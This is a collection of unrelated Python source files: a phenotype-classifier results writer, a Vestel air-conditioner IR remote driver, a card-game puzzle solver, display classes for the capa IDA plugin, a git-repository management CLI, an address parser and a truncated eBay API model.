            GroupRecord(identifier=x.identifier, group_name=x.identifier, group_id=y)
            for y, x in enumerate(pr)
        ]
    tr = collate_training_data(gr, pr, gp, verb=verb)
    logger.info("Records successfully loaded from file.")
    return tr, gr, pr, gp


def write_weights_file(weights_file: str, weights: Dict, annots: List[Optional[str]] = None):
    """
    Function to write the weights to specified file in tab-separated fashion
    with header.

    :param weights_file: The path to the file to which the output will be written
    :param weights: sorted dictionary storing weights with feature names as indices
    :param annots: annotations for the features names. Optional.
    """
    names, weight_vals = zip(*list(weights.items()))
    out = pd.DataFrame({'Feature Name': names, 'Weight': weight_vals})
    if annots is not None:
        out['Feature Annotation'] = annots
    # Expose the rank as a 1-based column rather than the index.
    out.index.name = 'Rank'
    out = out.reset_index(drop=False)
    out['Rank'] += 1
    out.to_csv(weights_file, sep='\t', index=False)


def write_cccv_accuracy_file(output_file: str, cccv_results):
    """
    Function to write the cccv accuracies in the exact format that phendb
    uses as input.

    :param output_file: The output file path.
    :param cccv_results: Nested dict of CCCV results:
                         completeness -> contamination -> score stats.
    """
    write_list = []
    for completeness, data in cccv_results.items():
        for contamination, nested_data in data.items():
            write_item = {
                "mean_balanced_accuracy": nested_data["score_mean"],
                "stddev_balanced_accuracy": nested_data["score_sd"],
                "contamination": contamination,
                "completeness": completeness
            }
            write_list.append(write_item)
    with open(output_file, "w") as outf_handler:
        json.dump(write_list, outf_handler, indent="\t")
        outf_handler.write('\n')


def load_cccv_accuracy_file(cccv_file: str) -> Dict:
    """
    Function to load cccv accuracies from phendb format.

    :param cccv_file: The CCCV results file.
    :return: A Dict of CCCV results in the internal CCCV results format.
    """
    cccv_results = {}
    with open(cccv_file) as fin:
        loaded = json.load(fin)
    for row in loaded:
        # Fixed: read fields by key instead of relying on the positional
        # order of row.values(), which silently breaks on reordered JSON.
        comple_dict = cccv_results.setdefault(row["completeness"], {})
        comple_dict[row["contamination"]] = {
            'score_mean': row["mean_balanced_accuracy"],
            'score_sd': row["stddev_balanced_accuracy"]
        }
    return cccv_results


def write_misclassifications_file(
    output_file: str,
    records: List[TrainingRecord],
    misclassifications,
    use_groups: bool = False
):
    """
    Function to write the misclassifications file.

    :param output_file: name of the outputfile
    :param records: List of trainingRecord objects
    :param misclassifications: List of percentages of misclassifications
    :param use_groups: toggles average over groups and groups output
    """
    identifier_list = [record.identifier for record in records]
    trait_sign_list = [record.trait_sign for record in records]
    if use_groups:
        # Aggregate misclassification rates and trait signs per group.
        group_names = [record.group_name for record in records]
        identifier_list = list(set(group_names))
        grouped_mcs = []
        grouped_signs = []
        for group in identifier_list:
            group_mcs = [mcs for mcs, group_name in zip(misclassifications, group_names)
                         if group == group_name]
            group_sign = [trait_sign for trait_sign, group_name in zip(trait_sign_list, group_names)
                          if group == group_name]
            grouped_mcs.append(np.mean(group_mcs))
            grouped_signs.append(np.mean(group_sign))
        trait_sign_list = grouped_signs
        misclassifications = grouped_mcs
    # Worst-classified entries first.
    sorted_tuples = sorted(zip(identifier_list, trait_sign_list, misclassifications),
                           key=lambda k: k[2], reverse=True)
    header = ["Identifier", "Trait present", "Mis-classifications [frac.]"]
    # Averaged group signs may not map back to YES/NO; report those as MIXED.
    trait_translation = {y: x for x, y in DEFAULT_TRAIT_SIGN_MAPPING.items()}
    with open(output_file, "w") as outf:
        outf.write("%s\n" % "\t".join(header))
        for identifier, trait_sign, mcs in sorted_tuples:
            outf.write(f'{identifier}\t{trait_translation.get(trait_sign, "MIXED")}\t{mcs}\n')
# Based on Vestel YKR-H/002E AC remote
from time import sleep

from acremote.thermo import W1Thermo
import gpirblast


class VestelACRemote():
    """State model and IR encoder for a Vestel YKR-H/002E style AC remote.

    Remote state (mode, temperature, switches, timer) is kept in attributes;
    ``_send_code`` serializes it into the 12-byte payload plus checksum and
    transmits it via ``gpirblast`` on the configured GPIO pin.
    """

    def __init__(self, gpio_pin: int):
        """Initialize default remote state.

        :param gpio_pin: GPIO pin number wired to the IR transmitter.
        """
        self._SWING = True
        self._ON = False
        self._HEALTH = False
        self._STRONG = False
        self._SLEEP = False
        self._TIMER = 0.0
        self._SCREEN = True
        self._CLEAN = False
        self._FRESH = False
        self._FEELING = False
        self._TEMP = 27
        self._MIN_TEMP = 16
        self._MAX_TEMP = 36
        self._MODES = {
            'AUTO': 0,
            'COOL': 32,
            'DRY': 64,
            'HEAT': 128,
            'FAN': 192,
        }
        self._MODE = 'COOL'
        self._SPEEDS = {
            'AUTO': 160,
            'LOW': 96,
            'MID': 64,
            'HIGH': 32,
        }
        self._SPEED = 'HIGH'
        self._GPIO_PIN = gpio_pin
        self._THERMO = W1Thermo()
        self._DATA_FIELDS = [
            195,  # 00 Device ID 0
            0,    # 01 Temperature value from 64 to 192 (step=8) +7 if SWING=off
            224,  # 02 Device ID 1
            0,    # 03 Unknown value
            0,    # 04 SPEED + TIMER integral part (in hours)
            0,    # 05 TIMER fractional part (30 in minutes) + STRONG switch (+/-64)
            0,    # 06 MODE, FRESH (+/-16), FEELING switch (+/-8), SLEEP (+/-4)
            0,    # 07 FEELING value +74 +ROOM_TEMP in Celsius (AC Remote value)
            0,    # 08 Unknown value
            0,    # 09 ON/OFF (0/32), health (+/-2 works only when on), TIMER on +64
            0,    # 10 Unknown value
            0,    # 11 Button ID
        ]

    #################################################
    # PROPERTIES
    #################################################
    @property
    def swing(self) -> bool:
        return self._SWING

    @swing.setter
    def swing(self, value: bool):
        if isinstance(value, bool):
            self._SWING = value
        else:
            raise ValueError('Swing value must be a boolean')

    @property
    def on(self) -> bool:
        return self._ON

    @on.setter
    def on(self, value: bool):
        if isinstance(value, bool):
            self._ON = value
        else:
            raise ValueError('On value must be a boolean')

    @property
    def health(self) -> bool:
        return self._HEALTH

    @health.setter
    def health(self, value: bool):
        if isinstance(value, bool):
            self._HEALTH = value
        else:
            raise ValueError('Health value must be a boolean')

    @property
    def strong(self) -> bool:
        return self._STRONG

    @strong.setter
    def strong(self, value: bool):
        if isinstance(value, bool):
            self._STRONG = value
        else:
            raise ValueError('Strong value must be a boolean')

    @property
    def sleep(self) -> bool:
        return self._SLEEP

    @sleep.setter
    def sleep(self, value: bool):
        if isinstance(value, bool):
            self._SLEEP = value
        else:
            raise ValueError('Sleep value must be a boolean')

    @property
    def screen(self) -> bool:
        return self._SCREEN

    @screen.setter
    def screen(self, value: bool):
        if isinstance(value, bool):
            self._SCREEN = value
        else:
            raise ValueError('Screen value must be a boolean')

    @property
    def clean(self) -> bool:
        return self._CLEAN

    @clean.setter
    def clean(self, value: bool):
        if isinstance(value, bool):
            self._CLEAN = value
        else:
            raise ValueError('Clean value must be a boolean')

    @property
    def fresh(self) -> bool:
        return self._FRESH

    @fresh.setter
    def fresh(self, value: bool):
        if isinstance(value, bool):
            self._FRESH = value
        else:
            raise ValueError('Fresh value must be a boolean')

    @property
    def feeling(self) -> bool:
        return self._FEELING

    @feeling.setter
    def feeling(self, value: bool):
        if isinstance(value, bool):
            self._FEELING = value
        else:
            raise ValueError('Feeling value must be a boolean')

    @property
    def temp(self) -> int:
        return self._TEMP

    @temp.setter
    def temp(self, value: int):
        # Accepts any value in [MIN_TEMP, MAX_TEMP]; anything else raises.
        if value in range(self._MIN_TEMP, self._MAX_TEMP + 1):
            self._TEMP = int(value)
        else:
            raise ValueError(
                'Temperature value must be within {} and {}'.format(
                    self._MIN_TEMP, self._MAX_TEMP
                )
            )

    @property
    def min_temp(self):
        return self._MIN_TEMP

    @property
    def max_temp(self):
        return self._MAX_TEMP

    @property
    def mode(self):
        return self._MODE

    @mode.setter
    def mode(self, value: str):
        if value in self._MODES:
            self._MODE = value
        else:
            raise ValueError('Mode value must be in {}'.format(self._MODES))

    @property
    def speed(self) -> str:
        return self._SPEED

    @speed.setter
    def speed(self, value: str):
        if value in self._SPEEDS:
            self._SPEED = value
        else:
            raise ValueError('Speed value must be in {}'.format(self._SPEEDS))

    @property
    def timer(self) -> float:
        return self._TIMER

    @timer.setter
    def timer(self, value: float):
        # Timer runs 0-24 h in half-hour steps; other fractions are truncated.
        error = 'Timer value must be within 0 and 24'
        try:
            value = float(value)
        except ValueError:
            raise ValueError(error)
        if 0.0 <= value <= 24.0:
            if value % 0.5 == 0.0:
                self._TIMER = value
            else:
                self._TIMER = float(int(value))  # cut out the fractional part
        else:
            # NOTE(review): the timer is reset before raising — out-of-range
            # input clears any previously set timer; confirm this is intended.
            self._TIMER = 0.0
            raise ValueError(error)

    # Dynamic property
    def timer_step(self, timer: float) -> float:
        """Return the timer increment (0.5 h below 10 h, else 1.0 h)."""
        if not timer:
            timer = self._TIMER
        step = 0.5
        if 10.0 <= timer < 24.0:
            step = 1.0
        return step

    #################################################
    # STATIC METHODS
    #################################################
    @staticmethod
    def form_octet(value: int):
        """Return ``value`` as an 8-character binary string.

        Shorter values are zero-padded on the left; longer values keep only
        the 8 least significant bits (overflow).
        """
        string = bin(value)[2:]  # remove '0b'
        length = len(string)
        if length < 8:
            string = '0' * (8 - length) + string
        if length > 8:
            string = string[-8:]  # overflow
        return string

    #################################################
    # INTERNAL METHODS
    #################################################
    def _set_on_off(self):
        """Encode ON/OFF, HEALTH, TIMER-armed and CLEAN into byte 09."""
        if self._ON:
            self._CLEAN = False
            self._DATA_FIELDS[9] = 32
            if self._HEALTH:
                self._DATA_FIELDS[9] += 2
            if self._TIMER != 0.0:
                self._DATA_FIELDS[9] += 64
        else:
            if self._CLEAN:
                self._DATA_FIELDS[9] = 4
            else:
                self._DATA_FIELDS[9] = 0

    def _set_mode_fresh_feeling_sleep(self):
        """Encode MODE/FRESH/FEELING/SLEEP into byte 06 and the feeling
        room temperature into byte 07."""
        self._DATA_FIELDS[6] = self._MODES[self._MODE]
        if self._FRESH:
            self._DATA_FIELDS[6] += 16
        if self._FEELING:
            self._DATA_FIELDS[6] += 8
            # Fixed: per the _DATA_FIELDS layout (and the else branch below)
            # the feeling temperature belongs in byte 07; it was previously
            # written to byte 06, clobbering the mode bits.
            self._DATA_FIELDS[7] = 74 + int(list(self._THERMO.poll().values())[0])
        else:
            self._DATA_FIELDS[7] = 0
        if self._SLEEP:
            self._DATA_FIELDS[6] += 4

    def _set_temp_and_swing(self):
        """Encode target temperature and swing switch into byte 01."""
        if self._MODE in ('AUTO', 'FAN'):
            # These modes carry no temperature.
            self._DATA_FIELDS[1] = 0
        else:
            self._DATA_FIELDS[1] = 64 + ((self._TEMP - self._MIN_TEMP) * 8)
        if not self._SWING:
            self._DATA_FIELDS[1] += 7

    def _set_speed_and_timer_int(self):
        """Encode fan speed and the whole-hour timer part into byte 04."""
        if self._MODE == 'AUTO':
            self._SPEED = self._MODE  # AUTO mode forces AUTO fan speed
        self._DATA_FIELDS[4] = self._SPEEDS[self._SPEED]
        self._DATA_FIELDS[4] += int(self._TIMER)  # timer hours

    def _set_strong_and_timer_frac(self):
        """Encode STRONG and the half-hour timer part into byte 05."""
        if self._STRONG:
            self._DATA_FIELDS[5] = 64
        else:
            self._DATA_FIELDS[5] = 0
        if self._TIMER % 1 == 0.5:
            self._DATA_FIELDS[5] += 30  # timer minutes

    def _form_bin_str(self):
        """Serialize the data fields plus trailing checksum octet into the
        bit string expected by the IR blaster (octets are bit-reversed)."""
        bin_str = ''
        chk_sum = 0
        for value in self._DATA_FIELDS:
            chk_sum += value
            bin_str += self.form_octet(value)[::-1]  # reverse octet to form a proper signal
        bin_str += self.form_octet(chk_sum)[::-1]
        return bin_str

    def _refresh_data_fields(self):
        """Re-encode the whole payload from the current state."""
        self._set_on_off()
        self._set_mode_fresh_feeling_sleep()
        self._set_temp_and_swing()
        self._set_speed_and_timer_int()
        self._set_strong_and_timer_frac()

    def _send_code(self):
        """Refresh the payload and transmit it over IR."""
        self._refresh_data_fields()
        gpirblast.send_code(self._GPIO_PIN, self._form_bin_str())

    #################################################
    # BUTTONS
    #################################################
    def btn_on(self):  # Virtual button
        """Force the unit on (idempotent wrapper around btn_on_off)."""
        self._ON = False
        self.btn_on_off()

    def btn_off(self):  # Virtual button
        """Force the unit off (idempotent wrapper around btn_on_off)."""
        self._ON = True
        self.btn_on_off()

    def btn_tmp_set(self, value: int) -> bool:  # Virtual button
        """Turn the unit on and set an absolute target temperature."""
        self._DATA_FIELDS[9] = 32
        self._DATA_FIELDS[11] = 5
        self._ON = True
        try:
            self.temp = int(value)
        except ValueError:
            # Fixed: the message previously hardcoded '16 and 32' although
            # the accepted range is MIN_TEMP..MAX_TEMP (16..36).
            raise ValueError(
                'Temperature value must be within {} and {}'.format(
                    self._MIN_TEMP, self._MAX_TEMP
                )
            )
        self._send_code()

    def btn_fungusproof(self):  # Button ID = NONE
        """Emulate the fungus-proof sequence by toggling power off repeatedly."""
        if not self._ON:
            self._ON = True  # Force turn off
        self.btn_on_off()
        sleep(1)
        self._ON = True
        self.btn_on_off()
        sleep(1)
        self._ON = True
        self.btn_on_off()

    def btn_tmp_up(self) -> bool:  # Button ID = 0
        """Raise the target temperature by one; returns False at the limit."""
        act_allow = self._TEMP < self._MAX_TEMP
        if act_allow:
            self._TEMP += 1
        else:
            self._TEMP = self._MAX_TEMP
        if self._ON:
            self._DATA_FIELDS[11] = 0
            self._send_code()
        return act_allow

    def btn_tmp_down(self) -> bool:  # Button ID = 1
        """Lower the target temperature by one; returns False at the limit."""
        act_allow = self._TEMP > self._MIN_TEMP
        if act_allow:
            self._TEMP -= 1
        else:
            self._TEMP = self._MIN_TEMP
        if self._ON:
            self._DATA_FIELDS[11] = 1
            self._send_code()
        return act_allow

    def btn_swing(self):  # Button ID = 2
        if self._ON:
            self._DATA_FIELDS[11] = 2
            self._SWING = not self._SWING
            self._send_code()

    def btn_speed(self, value: str):  # Button ID = 4
        if self._ON:
            self._DATA_FIELDS[11] = 4
            self.speed = value.upper()
            self._send_code()

    def btn_on_off(self):  # Button ID = 5
        self._DATA_FIELDS[11] = 5
        self._ON = not self._ON
        self._send_code()

    def btn_mode(self, value: str):  # Button ID = 6
        if self._ON:
            self._DATA_FIELDS[11] = 6
            self.mode = value.upper()
            self._send_code()

    def btn_health(self):  # Button ID = 7
        if self._ON:
            self._DATA_FIELDS[11] = 7
            self._HEALTH = not self._HEALTH
            self._send_code()

    def btn_strong(self):  # Button ID = 8
        if self._ON:
            self._DATA_FIELDS[11] = 8
            self._STRONG = not self._STRONG
            self._send_code()

    def btn_sleep(self):  # Button ID = 11
        if self._ON:
            self._DATA_FIELDS[11] = 11
            self._SLEEP = not self._SLEEP
            self._send_code()

    def btn_timer(self, value=0.0):  # Button ID = 13
        if self._ON:
            self._DATA_FIELDS[11] = 13
            self.timer = value
            self._send_code()

    def btn_screen(self):  # Button ID = 21
        if self._ON:
            self._DATA_FIELDS[11] = 21
            self._SCREEN = not self._SCREEN
            self._send_code()

    def btn_clean(self):  # Button ID = 25
        """Toggle self-clean; only allowed while the unit is off."""
        if self._ON:
            return False
        else:
            self._DATA_FIELDS[11] = 25
            self._CLEAN = not self._CLEAN
            self._send_code()
            return True

    def btn_fresh(self):  # Button ID = 29
        if self._ON:
            self._DATA_FIELDS[11] = 29
            self._FRESH = not self._FRESH
            self._send_code()

    def btn_feeling(self):  # Button ID = 30
        if self._ON:
            self._DATA_FIELDS[11] = 30
            self._FEELING = not self._FEELING
            self._send_code()


if __name__ == '__main__':
    # Fixed: gpio_pin is a required constructor argument; the demo previously
    # called VestelACRemote() with no argument, raising a TypeError.
    # Adjust the pin number to your wiring.
    a = VestelACRemote(gpio_pin=18)
    a.btn_on_off()
from copy import deepcopy d1 = [] d2 = [] player_2 = False with open('in', 'r') as f: f.readline() for line in f.readlines(): try: i = int(line.strip()) if player_2: d2.append(i) else: d1.append(i) except Exception: player_2 = True seen = set() next_game_id = 1 last_deck_1 = None last_deck_2 = None def game(deck1, deck2, game_id=0): global next_game_id, last_deck_1, last_deck_2 while len(deck1) > 0 and len(deck2) > 0: h = (str(game_id), str(deck1), str(deck2)) if h in seen: return 1 seen.add(h) card1, deck1 = deck1[0], deck1[1:] card2, deck2 = deck2[0], deck2[1:] if len(deck1) >= card1 and len(deck2) >= card2: next_game_id += 1 player_1_wins = game(deepcopy(deck1[:card1]), deepcopy(deck2[:card2]), game_id=next_game_id - 1) == 1 else: player_1_wins = card1 > card2 if player_1_wins: deck1 = deepcopy(deck1) + [card1, card2] else: deck2 = deepcopy(deck2) + [card2, card1] last_deck_1 = deck1 last_deck_2 = deck2 return 1 if len(deck2) == 0 else 2 game(deepcopy(d1), deepcopy(d2)) res = 0 d = last_deck_1 if len(last_deck_2) == 0 else last_deck_2 d = list(reversed(d)) for i in range(1, len(d) + 1): res += i * d[i - 1] print(res)
from dae.utils.variant_utils import mat2str def test_dae_transmitted_loader_simple(dae_transmitted): for fv in dae_transmitted.family_variants_iterator(): print(fv, mat2str(fv.best_state), mat2str(fv.gt))
# Copyright (C) 2020 FireEye, Inc. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at: [package root]/LICENSE.txt
# Unless required by applicable law or agreed to in writing, software distributed under the License
#  is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and limitations under the License.

import sys
import codecs

import idc
import idaapi
from PyQt5 import QtCore

import capa.ida.helpers


def info_to_name(display):
    """extract root value from display name

    e.g. function(my_function) => my_function
    """
    try:
        return display.split("(")[1].rstrip(")")
    except IndexError:
        return ""


def location_to_hex(location):
    """convert location to hex for display"""
    return "%08X" % location


class CapaExplorerDataItem(object):
    """store data for CapaExplorerDataModel

    one node of the result tree: holds the column values, a reference to the
    parent item, and the ordered list of child items
    """

    def __init__(self, parent, data, can_check=True):
        """initialize item

        @param parent: parent CapaExplorerDataItem, or None for the root
        @param data: list of column values [info, location, details]
        @param can_check: True to expose a tri-state checkbox for this item
        """
        self.pred = parent
        self._data = data
        self.children = []
        self._checked = False
        self._can_check = can_check

        # default state for item
        self.flags = QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable

        if self._can_check:
            self.flags = self.flags | QtCore.Qt.ItemIsUserCheckable | QtCore.Qt.ItemIsTristate

        # registering with the parent here keeps tree construction one-sided:
        # creating an item is enough to attach it
        if self.pred:
            self.pred.appendChild(self)

    def setIsEditable(self, isEditable=False):
        """modify item editable flags

        @param isEditable: True, can edit, False cannot edit
        """
        if isEditable:
            self.flags |= QtCore.Qt.ItemIsEditable
        else:
            self.flags &= ~QtCore.Qt.ItemIsEditable

    def setChecked(self, checked):
        """set item as checked

        @param checked: True, item checked, False item not checked
        """
        self._checked = checked

    def canCheck(self):
        """return True if this item exposes a checkbox"""
        return self._can_check

    def isChecked(self):
        """get item is checked"""
        return self._checked

    def appendChild(self, item):
        """add a new child to specified item

        @param item: CapaExplorerDataItem
        """
        self.children.append(item)

    def child(self, row):
        """get child row

        @param row: row number
        """
        return self.children[row]

    def childCount(self):
        """get child count"""
        return len(self.children)

    def columnCount(self):
        """get column count"""
        return len(self._data)

    def data(self, column):
        """get data at column

        @param: column number
        """
        try:
            return self._data[column]
        except IndexError:
            return None

    def parent(self):
        """get parent"""
        return self.pred

    def row(self):
        """get row location"""
        if self.pred:
            return self.pred.children.index(self)
        return 0

    def setData(self, column, value):
        """set data in column

        @param column: column number
        @value: value to set (assume str)
        """
        self._data[column] = value

    # NOTE: a `children(self)` generator method used to live here; it was
    # dead code — permanently shadowed by the `self.children` list attribute
    # assigned in __init__ — and has been removed. Iterate `item.children`
    # directly instead.

    def removeChildren(self):
        """remove children"""
        del self.children[:]

    def __str__(self):
        """get string representation of columns

        used for copy-n-paste operations
        """
        return " ".join([data for data in self._data if data])

    @property
    def info(self):
        """return data stored in information column"""
        return self._data[0]

    @property
    def location(self):
        """return data stored in location column"""
        try:
            # address stored as str, convert to int before return
            return int(self._data[1], 16)
        except ValueError:
            return None

    @property
    def details(self):
        """return data stored in details column"""
        return self._data[2]


class CapaExplorerRuleItem(CapaExplorerDataItem):
    """store data for rule result"""

    fmt = "%s (%d matches)"

    def __init__(self, parent, name, namespace, count, source, can_check=True):
        """initialize item

        @param parent: parent node
        @param name: rule name
        @param namespace: rule namespace
        @param count: number of match for this rule
        @param source: rule source (tooltip)
        """
        display = self.fmt % (name, count) if count > 1 else name
        super(CapaExplorerRuleItem, self).__init__(parent, [display, "", namespace], can_check)
        self._source = source

    @property
    def source(self):
        """return rule source to display (tooltip)"""
        return self._source


class CapaExplorerRuleMatchItem(CapaExplorerDataItem):
    """store data for rule match"""

    def __init__(self, parent, display, source=""):
        """initialize item

        @param parent: parent node
        @param display: text to display in UI
        @param source: rule match source to display (tooltip)
        """
        super(CapaExplorerRuleMatchItem, self).__init__(parent, [display, "", ""])
        self._source = source

    @property
    def source(self):
        """return rule contents for display"""
        return self._source


class CapaExplorerFunctionItem(CapaExplorerDataItem):
    """store data for function match"""

    fmt = "function(%s)"

    def __init__(self, parent, location, can_check=True):
        """initialize item

        @param parent: parent node
        @param location: virtual address of function as seen by IDA
        """
        super(CapaExplorerFunctionItem, self).__init__(
            parent, [self.fmt % idaapi.get_name(location), location_to_hex(location), ""], can_check
        )

    @property
    def info(self):
        """return function name"""
        info = super(CapaExplorerFunctionItem, self).info
        display = info_to_name(info)
        return display if display else info

    @info.setter
    def info(self, display):
        """set function name

        called when user changes function name in plugin UI

        @param display: new function name to display
        """
        self._data[0] = self.fmt % display


class CapaExplorerSubscopeItem(CapaExplorerDataItem):
    """store data for subscope match"""

    fmt = "subscope(%s)"

    def __init__(self, parent, scope):
        """initialize item

        @param parent: parent node
        @param scope: subscope name
        """
        super(CapaExplorerSubscopeItem, self).__init__(parent, [self.fmt % scope, "", ""])


class CapaExplorerBlockItem(CapaExplorerDataItem):
    """store data for basic block match"""

    fmt = "basic block(loc_%08X)"

    def __init__(self, parent, location):
        """initialize item

        @param parent: parent node
        @param location: virtual address of basic block as seen by IDA
        """
        super(CapaExplorerBlockItem, self).__init__(parent, [self.fmt % location, location_to_hex(location), ""])


class CapaExplorerDefaultItem(CapaExplorerDataItem):
    """store data for default match

    e.g. statement (and, or)
    """

    def __init__(self, parent, display, details="", location=None):
        """initialize item

        @param parent: parent node
        @param display: text to display in UI
        @param details: text to display in details section of UI
        @param location: virtual address as seen by IDA
        """
        location = location_to_hex(location) if location else ""
        super(CapaExplorerDefaultItem, self).__init__(parent, [display, location, details])


class CapaExplorerFeatureItem(CapaExplorerDataItem):
    """store data for feature match"""

    def __init__(self, parent, display, location="", details=""):
        """initialize item

        @param parent: parent node
        @param display: text to display in UI
        @param details: text to display in details section of UI
        @param location: virtual address as seen by IDA
        """
        location = location_to_hex(location) if location else ""
        super(CapaExplorerFeatureItem, self).__init__(parent, [display, location, details])


class CapaExplorerInstructionViewItem(CapaExplorerFeatureItem):
    """store data for instruction match"""

    def __init__(self, parent, display, location):
        """initialize item

        details section shows disassembly view for match

        @param parent: parent node
        @param display: text to display in UI
        @param location: virtual address as seen by IDA
        """
        details = capa.ida.helpers.get_disasm_line(location)
        super(CapaExplorerInstructionViewItem, self).__init__(parent, display, location=location, details=details)
        # remember IDA's own highlight so it can be restored later
        self.ida_highlight = idc.get_color(location, idc.CIC_ITEM)


class CapaExplorerByteViewItem(CapaExplorerFeatureItem):
    """store data for byte match"""

    def __init__(self, parent, display, location):
        """initialize item

        details section shows byte preview for match

        @param parent: parent node
        @param display: text to display in UI
        @param location: virtual address as seen by IDA
        """
        byte_snap = idaapi.get_bytes(location, 32)

        details = ""
        if byte_snap:
            # render as space-separated upper-case hex pairs, e.g. "4D 5A 90"
            byte_snap = codecs.encode(byte_snap, "hex").upper()
            details = " ".join([byte_snap[i : i + 2].decode() for i in range(0, len(byte_snap), 2)])

        super(CapaExplorerByteViewItem, self).__init__(parent, display, location=location, details=details)
        self.ida_highlight = idc.get_color(location, idc.CIC_ITEM)


class CapaExplorerStringViewItem(CapaExplorerFeatureItem):
    """store data for string match"""

    def __init__(self, parent, display, location, value):
        """initialize item

        @param parent: parent node
        @param display: text to display in UI
        @param location: virtual address as seen by IDA
        @param value: matched string, shown in the details column
        """
        super(CapaExplorerStringViewItem, self).__init__(parent, display, location=location, details=value)
        self.ida_highlight = idc.get_color(location, idc.CIC_ITEM)
"""Click command group for managing the git repositories of irekua/selia apps."""
import threading

import click

from irekua_dev_tools.utils import check_app_name

from .git import download_repository
from .git import update_repository
from .git import check_repository


@click.group(name="git")
@click.pass_context
@click.option('--origin', '-o', default='origin')
@click.option('--branch', '-b', default='master')
@click.option('--method', '-m', default='http')
def cli(ctx, origin, branch, method):
    """Commands to manage git repositories"""
    config = ctx.obj['config']['git']
    # NOTE(review): config values take precedence here — the CLI flag is only
    # the fallback when the key is absent from config. Confirm this is the
    # intended precedence (usually CLI overrides config).
    ctx.obj['origin'] = config.get('origin', origin)
    ctx.obj['branch'] = config.get('branch', branch)
    ctx.obj['method'] = config.get('method', method)


@cli.command()
@click.pass_context
@click.argument('name', type=str, required=False)
@click.option('--force', '-f', is_flag=True)
def download(ctx, name, force):
    """Download a single irekua/selia app repository"""
    target = ctx.obj['target']
    method = ctx.obj['method']
    repository_info = ctx.obj['repository_info']

    # With no NAME argument, fall through to downloading everything.
    if not name:
        ctx.invoke(download_all, force=force)
    else:
        check_app_name(name, repository_info)  # raises/aborts on unknown app
        download_repository(
            name,
            target,
            repository_info,
            method=method,
            force=force)


@cli.command()
@click.pass_context
@click.option('--force', '-f', is_flag=True)
def download_all(ctx, force):
    """Download all irekua/selia app repositories"""
    target = ctx.obj['target']
    method = ctx.obj['method']
    repository_info = ctx.obj['repository_info']

    for name in repository_info.keys():
        download_repository(
            name,
            target,
            repository_info,
            method=method,
            force=force)


@cli.command()
@click.pass_context
@click.argument('name', type=str, required=False)
@click.option('--download', '-d', is_flag=True)
def update(ctx, name, download):
    """Update a single irekua/selia app repository"""
    target = ctx.obj['target']
    origin = ctx.obj['origin']
    branch = ctx.obj['branch']
    method = ctx.obj['method']
    repository_info = ctx.obj['repository_info']

    # With no NAME argument, fall through to updating everything.
    if not name:
        ctx.invoke(update_all, download=download)
    else:
        check_app_name(name, repository_info)
        update_repository(
            name,
            target,
            repository_info,
            branch=branch,
            origin=origin,
            method=method,
            download=download)


@cli.command()
@click.pass_context
@click.option('--download', '-d', is_flag=True)
def update_all(ctx, download):
    """Update all irekua/selia app repositories"""
    target = ctx.obj['target']
    origin = ctx.obj['origin']
    branch = ctx.obj['branch']
    method = ctx.obj['method']
    repository_info = ctx.obj['repository_info']

    # One thread per repository; updates are I/O-bound (network/git), so
    # threads overlap the waiting.
    # NOTE(review): args are positional — their order must match
    # update_repository(name, target, repository_info, branch, origin,
    # method, download); verify against its signature.
    threads = [
        threading.Thread(
            target=update_repository,
            args=[
                name,
                target,
                repository_info,
                branch,
                origin,
                method,
                download])
        for name in repository_info.keys()]

    for thread in threads:
        thread.start()

    for thread in threads:
        thread.join()


@cli.command()
@click.pass_context
@click.argument('name', type=str, required=False)
@click.option('--silent', '-s', is_flag=True)
def check(ctx, name, silent):
    """Check the status of a single irekua/selia app repository"""
    target = ctx.obj['target']
    origin = ctx.obj['origin']
    branch = ctx.obj['branch']
    repository_info = ctx.obj['repository_info']

    # With no NAME argument, fall through to checking everything.
    if not name:
        ctx.invoke(check_all, silent=silent)
    else:
        check_app_name(name, repository_info)
        check_repository(name, target, silent=silent, origin=origin, branch=branch)


@cli.command()
@click.pass_context
@click.option('--silent', '-s', is_flag=True)
def check_all(ctx, silent):
    """Check the status of all irekua/selia app repository"""
    target = ctx.obj['target']
    origin = ctx.obj['origin']
    branch = ctx.obj['branch']
    repository_info = ctx.obj['repository_info']

    # NOTE(review): positional args must match
    # check_repository(name, target, silent, origin, branch).
    threads = [
        threading.Thread(
            target=check_repository,
            args=[name, target, silent, origin, branch])
        for name in repository_info.keys()]

    for thread in threads:
        thread.start()

    for thread in threads:
        thread.join()
import json from AddressFormatter.util import format import re from AddressFormatter.dataFromPincode import dataFromPincode def addressJSON(extractedAddress): with open('data.json', 'r') as dataJSON: dict = json.load(dataJSON) dict['extractedAddress'] = extractedAddress.replace('\n', ' ').replace('\f', '') with open('data.json', 'w') as dataJSON: json.dump(dict, dataJSON) addJSON={} pincode = re.findall("\d{6}", extractedAddress) if pincode!=[]: data = dataFromPincode(pincode[0])[0]['PostOffice'][0] addJSON={ "pin": pincode[0] } for i in data: if i=='District': addJSON['district']=data[i] addJSON['city']=data[i] elif i=='State': addJSON['state'] = data[i] formatAdd = format(extractedAddress, addJSON) return formatAdd
# coding: utf-8

"""
    Logistics API

    Model for a shipping rate the seller has purchased for a shipment via
    the eBay Logistics API (createFromShippingQuote). See the eBay Logistics
    API reference for field semantics.  # noqa: E501

    OpenAPI spec version: v1_beta.0.0

    Generated by: https://github.com/swagger-api/swagger-codegen.git
    (hand-modernized: `six` dependency removed, per-field property
    boilerplate generated programmatically; public interface unchanged)
"""

import pprint
import re  # noqa: F401


class PurchasedRate(object):
    """A purchased shipping rate and its carrier/service/cost details.

    NOTE: This class was auto generated by the swagger code generator
    program. All fields are optional and default to None; each field is
    exposed as a plain get/set property backed by a `_name` slot (the
    properties are attached right after the class definition below).
    """
    # Maps attribute name -> swagger type of the attribute's value.
    swagger_types = {
        'additional_options': 'list[AdditionalOption]',
        'base_shipping_cost': 'Amount',
        'destination_time_zone': 'str',
        'max_estimated_delivery_date': 'str',
        'min_estimated_delivery_date': 'str',
        'pickup_networks': 'list[str]',
        'pickup_slot_id': 'str',
        'pickup_type': 'str',
        'rate_id': 'str',
        'shipping_carrier_code': 'str',
        'shipping_carrier_name': 'str',
        'shipping_quote_id': 'str',
        'shipping_service_code': 'str',
        'shipping_service_name': 'str',
        'total_shipping_cost': 'Amount'
    }

    # Maps attribute name -> JSON key in the API payload.
